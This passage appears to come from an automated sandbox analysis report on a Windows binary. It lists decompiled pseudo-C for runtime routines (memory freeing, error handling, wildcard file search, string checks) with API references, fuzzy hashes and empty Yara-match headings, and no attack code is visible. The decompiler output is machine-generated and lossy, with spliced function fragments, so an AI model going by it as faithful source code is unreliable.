                    						E014012E1();
                    						L8:
                    						SetLastError(_t16);
                    					}
                    				} else {
                    					_t15 = E01406F1F(_t11, _t19, _t2);
                    					if(_t15 != 0) {
                    						L9:
                    						SetLastError(_t16);
                    						_t10 = _t15;
                    					} else {
                    						goto L2;
                    					}
                    				}
                    				return _t10;
                    			}

                    APIs
                    • GetLastError.KERNEL32(?,?,?,013FDB3F,013FF169,?,?,013C957D,?,00000400), ref: 01406A8A
                    • _free.LIBCMT ref: 01406ABF
                    • _free.LIBCMT ref: 01406AE6
                    • SetLastError.KERNEL32(00000000), ref: 01406AF3
                    • SetLastError.KERNEL32(00000000), ref: 01406AFC
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$_free
                    • String ID:
                    • API String ID: 3170660625-0
                    • Opcode ID: b3a2b6743ffa96a260a89e5b5001f0f9d01071cb842bc8d0d0c735bd71cbe00c
                    • Instruction ID: 6cf84e0fdabec70d4728680dd41fa36c6890c4c072a893fd603e6f37c827f7c6
                    • Opcode Fuzzy Hash: b3a2b6743ffa96a260a89e5b5001f0f9d01071cb842bc8d0d0c735bd71cbe00c
                    • Instruction Fuzzy Hash: DE01F9B22056022F9213B77B5C84D1B26699FE2670727403FF507E72F1EE74C8655921
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0140E2B4(intOrPtr* _a4) {
                    				intOrPtr _t6;
                    				intOrPtr* _t21;
                    				void* _t23;
                    				void* _t24;
                    				void* _t25;
                    				void* _t26;
                    				void* _t27;
                    
                    				_t21 = _a4;
                    				if(_t21 != 0) {
                    					_t23 =  *_t21 -  *0x1435348; // 0x1435340
                    					if(_t23 != 0) {
                    						E014012E1(_t7);
                    					}
                    					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x143534c; // 0x143a4f0
                    					if(_t24 != 0) {
                    						E014012E1(_t8);
                    					}
                    					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x1435350; // 0x143a4f0
                    					if(_t25 != 0) {
                    						E014012E1(_t9);
                    					}
                    					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x1435378; // 0x1435344
                    					if(_t26 != 0) {
                    						E014012E1(_t10);
                    					}
                    					_t6 =  *((intOrPtr*)(_t21 + 0x34));
                    					_t27 = _t6 -  *0x143537c; // 0x143a4f4
                    					if(_t27 != 0) {
                    						return E014012E1(_t6);
                    					}
                    				}
                    				return _t6;
                    			}

                    APIs
                    • _free.LIBCMT ref: 0140E2CC
                      • Part of subcall function 014012E1: HeapFree.KERNEL32(00000000,00000000,?,0140E567,?,00000000,?,00000000,?,0140E80B,?,00000007,?,?,0140EC39,?), ref: 014012F7
                      • Part of subcall function 014012E1: GetLastError.KERNEL32(?,?,0140E567,?,00000000,?,00000000,?,0140E80B,?,00000007,?,?,0140EC39,?,?), ref: 01401309
                    • _free.LIBCMT ref: 0140E2DE
                    • _free.LIBCMT ref: 0140E2F0
                    • _free.LIBCMT ref: 0140E302
                    • _free.LIBCMT ref: 0140E314
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: efacb57dd03c30e8e686aa47ac88e7131e6fccb087852938d3d97f8104be59c6
                    • Instruction ID: 7017226e54033c6996ab47628e901fee99dc2cc223c477ab55e3fb4db2a827dc
                    • Opcode Fuzzy Hash: efacb57dd03c30e8e686aa47ac88e7131e6fccb087852938d3d97f8104be59c6
                    • Instruction Fuzzy Hash: A0F0FF72504211AB9636EBABE4C5C5B7BD9AB10B107644C3FF144FB6A4CB70F8A14A58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E01404039(signed int __ecx) {
                    				intOrPtr _t7;
                    
                    				asm("lock xadd [eax], ecx");
                    				if((__ecx | 0xffffffff) == 0) {
                    					_t7 =  *0x1435a68; // 0xafcfd8
                    					if(_t7 != 0x1435848) {
                    						E014012E1(_t7);
                    						 *0x1435a68 = 0x1435848;
                    					}
                    				}
                    				E014012E1( *0x143a944);
                    				 *0x143a944 = 0;
                    				E014012E1( *0x143a948);
                    				 *0x143a948 = 0;
                    				E014012E1( *0x143a644);
                    				 *0x143a644 = 0;
                    				E014012E1( *0x143a648);
                    				 *0x143a648 = 0;
                    				return 1;
                    			}

                    APIs
                    • _free.LIBCMT ref: 01404057
                      • Part of subcall function 014012E1: HeapFree.KERNEL32(00000000,00000000,?,0140E567,?,00000000,?,00000000,?,0140E80B,?,00000007,?,?,0140EC39,?), ref: 014012F7
                      • Part of subcall function 014012E1: GetLastError.KERNEL32(?,?,0140E567,?,00000000,?,00000000,?,0140E80B,?,00000007,?,?,0140EC39,?,?), ref: 01401309
                    • _free.LIBCMT ref: 01404069
                    • _free.LIBCMT ref: 0140407C
                    • _free.LIBCMT ref: 0140408D
                    • _free.LIBCMT ref: 0140409E
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: bed084806e6eb2e89ea078d421fe3c959ffc532e1ecfeaaa49f4cf49b2eac3c5
                    • Instruction ID: ef7bb992f15ca711078fd19565056b864e1b5f0ae1f2154bd9fe8bfef59a6015
                    • Opcode Fuzzy Hash: bed084806e6eb2e89ea078d421fe3c959ffc532e1ecfeaaa49f4cf49b2eac3c5
                    • Instruction Fuzzy Hash: D0F0D0F48413119B9A32AF56B4C14153BA4ABB4B20335056FF494F72B8C7354551EBC4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 81%
                    			E013E8350(intOrPtr* __ecx, intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20) {
                    				intOrPtr* _v4;
                    				void* __ebx;
                    				void* __edi;
                    				void* __ebp;
                    				signed int _t45;
                    				signed int _t46;
                    				signed int _t48;
                    				void* _t50;
                    				signed int _t54;
                    				signed int _t55;
                    				void* _t60;
                    				signed int _t61;
                    				void* _t62;
                    				signed int _t63;
                    				void* _t64;
                    				signed int _t69;
                    				char* _t71;
                    				intOrPtr* _t75;
                    				signed int _t77;
                    				signed int _t78;
                    				intOrPtr _t84;
                    				intOrPtr _t85;
                    				signed int _t87;
                    				intOrPtr _t88;
                    				intOrPtr _t90;
                    				intOrPtr _t92;
                    				intOrPtr* _t93;
                    				intOrPtr* _t94;
                    				void* _t95;
                    				void* _t96;
                    				void* _t99;
                    				void* _t100;
                    
                    				_t94 = _a16;
                    				_t93 = __ecx;
                    				_t71 = "ValueNames";
                    				_t87 = _a8;
                    				 *__ecx = _a4;
                    				 *((intOrPtr*)(__ecx + 8)) = _a12;
                    				_t45 = _t87;
                    				 *(__ecx + 4) = _t87;
                    				 *((intOrPtr*)(__ecx + 0xc)) = _t94;
                    				 *((short*)(__ecx + 0x10)) = 0;
                    				while(1) {
                    					_t84 =  *_t45;
                    					if(_t84 !=  *_t71) {
                    						break;
                    					}
                    					if(_t84 == 0) {
                    						L5:
                    						_t46 = 0;
                    					} else {
                    						_t84 =  *((intOrPtr*)(_t45 + 1));
                    						if(_t84 != _t71[1]) {
                    							break;
                    						} else {
                    							_t45 = _t45 + 2;
                    							_t71 =  &(_t71[2]);
                    							if(_t84 != 0) {
                    								continue;
                    							} else {
                    								goto L5;
                    							}
                    						}
                    					}
                    					L7:
                    					_t69 = _a20;
                    					_t105 = _t46;
                    					if(_t46 == 0) {
                    						_push(_a12);
                    						 *((short*)(_t93 + 0x10)) = 0x101;
                    						_push(0x14383f8);
                    						_push(_t87);
                    						E013C56E5(_t69, _t84, _t105);
                    						_t92 = _a12;
                    						_t99 = _t96 + 0xc;
                    						if(_t69 != 0) {
                    							 *((intOrPtr*)( *_t69 + 4))( *((intOrPtr*)(_t93 + 4)), _t92, _t94);
                    						}
                    						_t60 = E013F4DBF(0x1437448, 0x1437448);
                    						_t100 = _t99 + 8;
                    						_t107 = _t60;
                    						if(_t60 != 0) {
                    							E013E88C0(_t69, _a4 + 0x3c, _t94,  *((intOrPtr*)(_t93 + 4)), _t92, _t94);
                    						}
                    						_t61 = E013F4DFB(_t92, 0x1437448, 0x1439f60);
                    						_t96 = _t100 + 8;
                    						_t87 = _t61;
                    						_push(0xc);
                    						_t62 = E013C6330(_t69,  *((intOrPtr*)(_t93 + 0xc)), _t107, "ThisPointer:");
                    						_t108 =  *_t87;
                    						_t95 = _t62;
                    						if( *_t87 != 0) {
                    							_t77 = _t87;
                    							_t21 = _t77 + 1; // 0x1
                    							_t84 = _t21;
                    							do {
                    								_t63 =  *_t77;
                    								_t77 = _t77 + 1;
                    								__eflags = _t63;
                    							} while (_t63 != 0);
                    							_t78 = _t77 - _t84;
                    							__eflags = _t78;
                    						} else {
                    							_t78 = 0;
                    						}
                    						_push(_t78);
                    						_t64 = E013C6330(_t69, _t95, _t108, _t87);
                    						_push(0x3b);
                    						E013C6296(_t69, _t64, _t84, _t87, 1);
                    						_t94 = _v4;
                    					}
                    					if( *((char*)(_t93 + 0x10)) != 0) {
                    						L32:
                    						_t88 = _a12;
                    						goto L33;
                    					} else {
                    						_t50 = E013FF910( *((intOrPtr*)(_t93 + 4)), "ThisPointer:", 0xc);
                    						_t96 = _t96 + 0xc;
                    						if(_t50 != 0) {
                    							L29:
                    							__eflags =  *((char*)(_t93 + 0x10));
                    							if( *((char*)(_t93 + 0x10)) != 0) {
                    								goto L32;
                    							} else {
                    								_t88 = _a12;
                    								__eflags = _t69;
                    								if(_t69 != 0) {
                    									 *((char*)(_t93 + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)( *_t69 + 4))))( *((intOrPtr*)(_t93 + 4)), _t88, _t94);
                    								}
                    							}
                    							L33:
                    							__eflags =  *((char*)(_t93 + 0x10));
                    							if( *((char*)(_t93 + 0x10)) == 0) {
                    								_t48 = E013F4DBF(0x1437448, 0x1437448);
                    								__eflags = _t48;
                    								if(_t48 != 0) {
                    									 *((char*)(_t93 + 0x10)) = E013E88C0(_t69, _a4 + 0x3c, _t94,  *((intOrPtr*)(_t93 + 4)), _t88, _t94);
                    								}
                    							}
                    							return _t93;
                    						} else {
                    							_t54 = E013F4DFB(_t87, 0x1437448, 0x1439f60);
                    							_t90 =  *((intOrPtr*)(_t93 + 4));
                    							_t96 = _t96 + 8;
                    							_t75 = _t90 + 0xc;
                    							while(1) {
                    								_t85 =  *_t75;
                    								if(_t85 !=  *_t54) {
                    									break;
                    								}
                    								if(_t85 == 0) {
                    									L25:
                    									_t55 = 0;
                    								} else {
                    									_t85 =  *((intOrPtr*)(_t75 + 1));
                    									if(_t85 !=  *((intOrPtr*)(_t54 + 1))) {
                    										break;
                    									} else {
                    										_t75 = _t75 + 2;
                    										_t54 = _t54 + 2;
                    										if(_t85 != 0) {
                    											continue;
                    										} else {
                    											goto L25;
                    										}
                    									}
                    								}
                    								L27:
                    								_t115 = _t55;
                    								if(_t55 != 0) {
                    									goto L29;
                    								} else {
                    									_push( *((intOrPtr*)(_t93 + 8)));
                    									_push(0x14384e4);
                    									_push(_t90);
                    									E013C56E5(_t69, _t85, _t115);
                    									 *_t94 = _a4;
                    									 *((char*)(_t93 + 0x10)) = 1;
                    									return _t93;
                    								}
                    								goto L37;
                    							}
                    							asm("sbb eax, eax");
                    							_t55 = _t54 | 0x00000001;
                    							__eflags = _t55;
                    							goto L27;
                    						}
                    					}
                    					L37:
                    				}
                    				asm("sbb eax, eax");
                    				_t46 = _t45 | 0x00000001;
                    				__eflags = _t46;
                    				goto L7;
                    			}

                    APIs
                    • ___std_type_info_name.LIBVCRUNTIME ref: 013E840E
                    • ___std_type_info_name.LIBVCRUNTIME ref: 013E8482
                    Strings
                    Yara matches
                    Similarity
                    • API ID: ___std_type_info_name
                    • String ID: ThisPointer:$ValueNames
                    • API String ID: 1734802720-2375088429
                    • Opcode ID: e0a951917b4708f90f9034cfd114888179fda84b0ae244cebe89ce53c40a978e
                    • Instruction ID: a88ecc4cf0b4ca5e63bc8c5a429ec4da94d80d3d73edcce3fef8c1b8ebe750ea
                    • Opcode Fuzzy Hash: e0a951917b4708f90f9034cfd114888179fda84b0ae244cebe89ce53c40a978e
                    • Instruction Fuzzy Hash: D7515531A043415FD7219F2CDC45B67BBEAEFA170CF1448ADE981972A2D772E809C761
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 74%
                    			E0140C786(signed int _a4, signed int _a8, intOrPtr _a12) {
                    				intOrPtr _v0;
                    				char _v6;
                    				char _v8;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				signed int _v28;
                    				signed int _v36;
                    				intOrPtr* _v64;
                    				intOrPtr _v96;
                    				intOrPtr* _v100;
                    				CHAR* _v104;
                    				signed int _v116;
                    				char _v290;
                    				signed int _v291;
                    				struct _WIN32_FIND_DATAA _v336;
                    				union _FINDEX_INFO_LEVELS _v340;
                    				signed int _v344;
                    				signed int _v348;
                    				intOrPtr _v440;
                    				void* __edi;
                    				void* __ebp;
                    				intOrPtr* _t80;
                    				signed int _t82;
                    				signed int _t87;
                    				signed int _t91;
                    				signed int _t93;
                    				signed int _t95;
                    				signed int _t96;
                    				signed int _t100;
                    				signed int _t103;
                    				signed int _t108;
                    				signed int _t111;
                    				intOrPtr _t113;
                    				signed char _t115;
                    				union _FINDEX_INFO_LEVELS _t123;
                    				signed int _t128;
                    				signed int _t131;
                    				void* _t136;
                    				void* _t138;
                    				signed int _t139;
                    				signed int _t142;
                    				signed int _t144;
                    				signed int _t146;
                    				signed int* _t147;
                    				signed int _t150;
                    				void* _t153;
                    				CHAR* _t154;
                    				char _t157;
                    				char _t159;
                    				intOrPtr* _t162;
                    				void* _t163;
                    				intOrPtr* _t164;
                    				signed int _t166;
                    				void* _t168;
                    				intOrPtr* _t169;
                    				signed int _t173;
                    				signed int _t177;
                    				signed int _t178;
                    				intOrPtr* _t183;
                    				void* _t192;
                    				intOrPtr _t193;
                    				signed int _t195;
                    				signed int _t196;
                    				signed int _t198;
                    				signed int _t199;
                    				signed int _t201;
                    				union _FINDEX_INFO_LEVELS _t202;
                    				signed int _t207;
                    				signed int _t209;
                    				signed int _t210;
                    				void* _t212;
                    				intOrPtr _t213;
                    				void* _t214;
                    				signed int _t218;
                    				void* _t220;
                    				signed int _t221;
                    				void* _t222;
                    				void* _t223;
                    				void* _t224;
                    				signed int _t225;
                    				void* _t226;
                    				void* _t227;
                    
                    				_t80 = _a8;
                    				_t223 = _t222 - 0x20;
                    				if(_t80 != 0) {
                    					_t207 = _a4;
                    					_t159 = 0;
                    					 *_t80 = 0;
                    					_t198 = 0;
                    					_t150 = 0;
                    					_v36 = 0;
                    					_v336.cAlternateFileName = 0;
                    					_v28 = 0;
                    					__eflags =  *_t207;
                    					if( *_t207 == 0) {
                    						L9:
                    						_v12 = _v12 & 0x00000000;
                    						_t82 = _t150 - _t198;
                    						_v8 = _t159;
                    						_t190 = (_t82 >> 2) + 1;
                    						__eflags = _t150 - _t198;
                    						_v16 = (_t82 >> 2) + 1;
                    						asm("sbb esi, esi");
                    						_t209 =  !_t207 & _t82 + 0x00000003 >> 0x00000002;
                    						__eflags = _t209;
                    						if(_t209 != 0) {
                    							_t196 = _t198;
                    							_t157 = _t159;
                    							do {
                    								_t183 =  *_t196;
                    								_t17 = _t183 + 1; // 0x1
                    								_v8 = _t17;
                    								do {
                    									_t142 =  *_t183;
                    									_t183 = _t183 + 1;
                    									__eflags = _t142;
                    								} while (_t142 != 0);
                    								_t157 = _t157 + 1 + _t183 - _v8;
                    								_t196 = _t196 + 4;
                    								_t144 = _v12 + 1;
                    								_v12 = _t144;
                    								__eflags = _t144 - _t209;
                    							} while (_t144 != _t209);
                    							_t190 = _v16;
                    							_v8 = _t157;
                    							_t150 = _v336.cAlternateFileName;
                    						}
                    						_t210 = E0140389B(_t190, _v8, 1);
                    						_t224 = _t223 + 0xc;
                    						__eflags = _t210;
                    						if(_t210 != 0) {
                    							_t87 = _t210 + _v16 * 4;
                    							_v20 = _t87;
                    							_t191 = _t87;
                    							_v16 = _t87;
                    							__eflags = _t198 - _t150;
                    							if(_t198 == _t150) {
                    								L23:
                    								_t199 = 0;
                    								__eflags = 0;
                    								 *_a8 = _t210;
                    								goto L24;
                    							} else {
                    								_t93 = _t210 - _t198;
                    								__eflags = _t93;
                    								_v24 = _t93;
                    								do {
                    									_t162 =  *_t198;
                    									_v12 = _t162 + 1;
                    									do {
                    										_t95 =  *_t162;
                    										_t162 = _t162 + 1;
                    										__eflags = _t95;
                    									} while (_t95 != 0);
                    									_t163 = _t162 - _v12;
                    									_t35 = _t163 + 1; // 0x1
                    									_t96 = _t35;
                    									_push(_t96);
                    									_v12 = _t96;
                    									_t100 = E01411431(_t163, _t191, _v20 - _t191 + _v8,  *_t198);
                    									_t224 = _t224 + 0x10;
                    									__eflags = _t100;
                    									if(_t100 != 0) {
                    										_push(0);
                    										_push(0);
                    										_push(0);
                    										_push(0);
                    										_push(0);
                    										E013FDA8E();
                    										asm("int3");
                    										_t220 = _t224;
                    										_push(_t163);
                    										_t164 = _v64;
                    										_t47 = _t164 + 1; // 0x1
                    										_t192 = _t47;
                    										do {
                    											_t103 =  *_t164;
                    											_t164 = _t164 + 1;
                    											__eflags = _t103;
                    										} while (_t103 != 0);
                    										_push(_t198);
                    										_t201 = _a8;
                    										_t166 = _t164 - _t192 + 1;
                    										_v12 = _t166;
                    										__eflags = _t166 - (_t103 | 0xffffffff) - _t201;
                    										if(_t166 <= (_t103 | 0xffffffff) - _t201) {
                    											_push(_t150);
                    											_t50 = _t201 + 1; // 0x1
                    											_t153 = _t50 + _t166;
                    											_t212 = E014009B2(_t166, _t153, 1);
                    											_t168 = _t210;
                    											__eflags = _t201;
                    											if(_t201 == 0) {
                    												L34:
                    												_push(_v12);
                    												_t153 = _t153 - _t201;
                    												_t108 = E01411431(_t168, _t212 + _t201, _t153, _v0);
                    												_t225 = _t224 + 0x10;
                    												__eflags = _t108;
                    												if(__eflags != 0) {
                    													goto L37;
                    												} else {
                    													_t136 = E0140CB55(_a12, __eflags, _t212);
                    													E014012E1(0);
                    													_t138 = _t136;
                    													goto L36;
                    												}
                    											} else {
                    												_push(_t201);
                    												_t139 = E01411431(_t168, _t212, _t153, _a4);
                    												_t225 = _t224 + 0x10;
                    												__eflags = _t139;
                    												if(_t139 != 0) {
                    													L37:
                    													_push(0);
                    													_push(0);
                    													_push(0);
                    													_push(0);
                    													_push(0);
                    													E013FDA8E();
                    													asm("int3");
                    													_push(_t220);
                    													_t221 = _t225;
                    													_t226 = _t225 - 0x150;
                    													_t111 =  *0x1435234; // 0x78d9f939
                    													_v116 = _t111 ^ _t221;
                    													_t169 = _v100;
                    													_push(_t153);
                    													_t154 = _v104;
                    													_push(_t212);
                    													_t213 = _v96;
                    													_push(_t201);
                    													_v440 = _t213;
                    													while(1) {
                    														__eflags = _t169 - _t154;
                    														if(_t169 == _t154) {
                    															break;
                    														}
                    														_t113 =  *_t169;
                    														__eflags = _t113 - 0x2f;
                    														if(_t113 != 0x2f) {
                    															__eflags = _t113 - 0x5c;
                    															if(_t113 != 0x5c) {
                    																__eflags = _t113 - 0x3a;
                    																if(_t113 != 0x3a) {
                    																	_t169 = E01414060(_t154, _t169);
                    																	continue;
                    																}
                    															}
                    														}
                    														break;
                    													}
                    													_t193 =  *_t169;
                    													__eflags = _t193 - 0x3a;
                    													if(_t193 != 0x3a) {
                    														L47:
                    														_t202 = 0;
                    														__eflags = _t193 - 0x2f;
                    														if(_t193 == 0x2f) {
                    															L51:
                    															_t115 = 1;
                    															__eflags = 1;
                    														} else {
                    															__eflags = _t193 - 0x5c;
                    															if(_t193 == 0x5c) {
                    																goto L51;
                    															} else {
                    																__eflags = _t193 - 0x3a;
                    																if(_t193 == 0x3a) {
                    																	goto L51;
                    																} else {
                    																	_t115 = 0;
                    																}
                    															}
                    														}
                    														asm("sbb eax, eax");
                    														_v344 =  ~(_t115 & 0x000000ff) & _t169 - _t154 + 0x00000001;
                    														E013F5890(_t202,  &_v336, _t202, 0x140);
                    														_t227 = _t226 + 0xc;
                    														_t214 = FindFirstFileExA(_t154, _t202,  &_v336, _t202, _t202, _t202);
                    														_t123 = _v340;
                    														__eflags = _t214 - 0xffffffff;
                    														if(_t214 != 0xffffffff) {
                    															_t173 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
                    															__eflags = _t173;
                    															_v348 = _t173 >> 2;
                    															do {
                    																__eflags = _v336.cFileName - 0x2e;
                    																if(_v336.cFileName != 0x2e) {
                    																	L64:
                    																	_push(_t123);
                    																	_push(_v344);
                    																	_t123 =  &(_v336.cFileName);
                    																	_push(_t154);
                    																	_push(_t123);
                    																	L28();
                    																	_t227 = _t227 + 0x10;
                    																	__eflags = _t123;
                    																	if(_t123 != 0) {
                    																		goto L54;
                    																	} else {
                    																		goto L65;
                    																	}
                    																} else {
                    																	_t177 = _v291;
                    																	__eflags = _t177;
                    																	if(_t177 == 0) {
                    																		goto L65;
                    																	} else {
                    																		__eflags = _t177 - 0x2e;
                    																		if(_t177 != 0x2e) {
                    																			goto L64;
                    																		} else {
                    																			__eflags = _v290;
                    																			if(_v290 == 0) {
                    																				goto L65;
                    																			} else {
                    																				goto L64;
                    																			}
                    																		}
                    																	}
                    																}
                    																goto L58;
                    																L65:
                    																_t128 = FindNextFileA(_t214,  &_v336);
                    																__eflags = _t128;
                    																_t123 = _v340;
                    															} while (_t128 != 0);
                    															_t194 =  *_t123;
                    															_t178 = _v348;
                    															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
                    															__eflags = _t178 - _t131;
                    															if(_t178 != _t131) {
                    																E01413C80(_t194 + _t178 * 4, _t131 - _t178, 4, E0140C76E);
                    															}
                    														} else {
                    															_push(_t123);
                    															_push(_t202);
                    															_push(_t202);
                    															_push(_t154);
                    															L28();
                    															L54:
                    															_t202 = _t123;
                    														}
                    														__eflags = _t214 - 0xffffffff;
                    														if(_t214 != 0xffffffff) {
                    															FindClose(_t214);
                    														}
                    														_t124 = _t202;
                    													} else {
                    														_t124 =  &(_t154[1]);
                    														__eflags = _t169 -  &(_t154[1]);
                    														if(_t169 ==  &(_t154[1])) {
                    															goto L47;
                    														} else {
                    															_push(_t213);
                    															_push(0);
                    															_push(0);
                    															_push(_t154);
                    															L28();
                    														}
                    													}
                    													L58:
                    													__eflags = _v16 ^ _t221;
                    													return E013F268B(_t124, _v16 ^ _t221);
                    												} else {
                    													goto L34;
                    												}
                    											}
                    										} else {
                    											_t138 = 0xc;
                    											L36:
                    											return _t138;
                    										}
                    									} else {
                    										goto L22;
                    									}
                    									goto L68;
                    									L22:
                    									_t195 = _v16;
                    									 *((intOrPtr*)(_v24 + _t198)) = _t195;
                    									_t198 = _t198 + 4;
                    									_t191 = _t195 + _v12;
                    									_v16 = _t195 + _v12;
                    									__eflags = _t198 - _t150;
                    								} while (_t198 != _t150);
                    								goto L23;
                    							}
                    						} else {
                    							_t199 = _t198 | 0xffffffff;
                    							L24:
                    							E014012E1(0);
                    							goto L25;
                    						}
                    					} else {
                    						while(1) {
                    							_v8 = 0x3f2a;
                    							_v6 = _t159;
                    							_t146 = E01414020( *_t207,  &_v8);
                    							__eflags = _t146;
                    							if(_t146 != 0) {
                    								_push( &_v36);
                    								_push(_t146);
                    								_push( *_t207);
                    								L38();
                    								_t223 = _t223 + 0xc;
                    							} else {
                    								_t146 =  &_v36;
                    								_push(_t146);
                    								_push(0);
                    								_push(0);
                    								_push( *_t207);
                    								L28();
                    								_t223 = _t223 + 0x10;
                    							}
                    							_t199 = _t146;
                    							__eflags = _t199;
                    							if(_t199 != 0) {
                    								break;
                    							}
                    							_t207 = _t207 + 4;
                    							_t159 = 0;
                    							__eflags =  *_t207;
                    							if( *_t207 != 0) {
                    								continue;
                    							} else {
                    								_t150 = _v336.cAlternateFileName;
                    								_t198 = _v36;
                    								goto L9;
                    							}
                    							goto L68;
                    						}
                    						L25:
                    						E0140CB30( &_v36);
                    						_t91 = _t199;
                    						goto L26;
                    					}
                    				} else {
                    					_t147 = E013FDB3A();
                    					_t218 = 0x16;
                    					 *_t147 = _t218;
                    					E013FDA61();
                    					_t91 = _t218;
                    					L26:
                    					return _t91;
                    				}
                    				L68:
                    			}

                    APIs
                    • _strpbrk.LIBCMT ref: 0140C7D5
                    • _free.LIBCMT ref: 0140C8F2
                      • Part of subcall function 013FDA8E: IsProcessorFeaturePresent.KERNEL32(00000017,013FDA60,?,?,?,00000008,?,00000016,?,?,013FDA6D,00000000,00000000,00000000,00000000,00000000), ref: 013FDA90
                      • Part of subcall function 013FDA8E: GetCurrentProcess.KERNEL32(C0000417), ref: 013FDAB2
                      • Part of subcall function 013FDA8E: TerminateProcess.KERNEL32(00000000), ref: 013FDAB9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                    • String ID: *?$.
                    • API String ID: 2812119850-3972193922
                    • Opcode ID: 4ed1ffbfd5603ec42b2d431e78c02d065da8ae8646705422cae7837eb525ff75
                    • Instruction ID: 7906ee01427550f84dcbc817f563fb3576068c99db79cfbb0cbb732bc5ae1a53
                    • Opcode Fuzzy Hash: 4ed1ffbfd5603ec42b2d431e78c02d065da8ae8646705422cae7837eb525ff75
                    • Instruction Fuzzy Hash: 5051B372D0010ADFDF16CFAAC880AAEBBB5EF58310F2442BED954E7391D6319A018B54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 71%
                    			E013CD6F0(intOrPtr* __ecx, signed int __edi, intOrPtr _a4, intOrPtr _a8, void* _a12) {
                    				intOrPtr _v4;
                    				void* _v16;
                    				signed int _v20;
                    				void* _v24;
                    				intOrPtr _v28;
                    				char _v36;
                    				signed int _v40;
                    				void* _v48;
                    				void* __ebx;
                    				void* __esi;
                    				void* __ebp;
                    				signed int _t46;
                    				void* _t48;
                    				void* _t49;
                    				intOrPtr _t56;
                    				void* _t58;
                    				intOrPtr* _t59;
                    				char* _t70;
                    				intOrPtr* _t74;
                    				intOrPtr* _t77;
                    				intOrPtr _t80;
                    				signed int _t81;
                    				signed int _t90;
                    				signed int _t91;
                    				intOrPtr* _t95;
                    				intOrPtr _t98;
                    				intOrPtr _t100;
                    				void* _t102;
                    				intOrPtr* _t103;
                    				signed int _t104;
                    				void* _t105;
                    				intOrPtr* _t113;
                    				void* _t114;
                    				void* _t121;
                    				signed int _t128;
                    				void* _t129;
                    
                    				_t104 = __edi;
                    				_t80 = _a8;
                    				_t113 = __ecx;
                    				if(_t80 == 0) {
                    					L13:
                    					_t90 =  *(_t113 + 0x10);
                    					_t100 = _a4;
                    					__eflags = _t90 - _t100;
                    					if(__eflags < 0) {
                    						_push("invalid string position");
                    						E013F0FA1(_t104, _t113, __eflags);
                    						goto L41;
                    					} else {
                    						_push(_t121);
                    						_t121 = _a12;
                    						__eflags =  !_t90 - _t121;
                    						if(__eflags <= 0) {
                    							L41:
                    							_push("string too long");
                    							E013F0F81(_t100, _t104, _t113, __eflags);
                    							goto L42;
                    						} else {
                    							_push(_t104);
                    							_t104 = _t121 + _t90;
                    							__eflags = _t121;
                    							if(_t121 == 0) {
                    								L39:
                    								return _t113;
                    							} else {
                    								__eflags = _t104 - 0xfffffffe;
                    								if(__eflags > 0) {
                    									L42:
                    									_push("string too long");
                    									E013F0F81(_t100, _t104, _t113, __eflags);
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									_push(_t121);
                    									_push(0xffffffff);
                    									_push(E01416930);
                    									_push( *[fs:0x0]);
                    									_t129 = _t128 - 0xc;
                    									_push(_t80);
                    									_push(_t113);
                    									_push(_t104);
                    									_t46 =  *0x1435234; // 0x78d9f939
                    									_push(_t46 ^ _t128);
                    									_t48 =  &_v36;
                    									 *[fs:0x0] = _t48;
                    									_t81 = _t90;
                    									_t91 =  *(_t81 + 8);
                    									_t114 = _v16;
                    									_t105 =  *(_t81 + 0xc);
                    									_v48 = _t105;
                    									_v40 = _t91;
                    									__eflags = _t91 - _t114;
                    									if(_t91 != _t114) {
                    										__eflags = _t114;
                    										if(__eflags != 0) {
                    											_t49 = E013CD9F0(_t91, _t105, __eflags, _t114);
                    											_t91 = _v20;
                    											_t129 = _t129 + 4;
                    										} else {
                    											_t49 = 0;
                    										}
                    										__eflags = _t114 - _t91;
                    										_v24 = _t49;
                    										_t102 =  <  ? _t114 : _t91;
                    										__eflags = _t105;
                    										if(_t105 != 0) {
                    											__eflags = _t49;
                    											if(_t49 != 0) {
                    												E013E7060(_t49, _t102, _t105, _t102);
                    												_t91 = _v20;
                    												_t129 = _t129 + 0x10;
                    											}
                    										}
                    										__eflags = 0;
                    										memset(_t105, 0, _t91 << 0);
                    										_t48 = L013CDA60(_v28);
                    										_t105 = _v24;
                    									}
                    									 *(_t81 + 0xc) = _t105;
                    									 *(_t81 + 8) = _t114;
                    									 *((intOrPtr*)(_t81 + 4)) = 0xffffffff;
                    									 *[fs:0x0] = _v16;
                    									return _t48;
                    								} else {
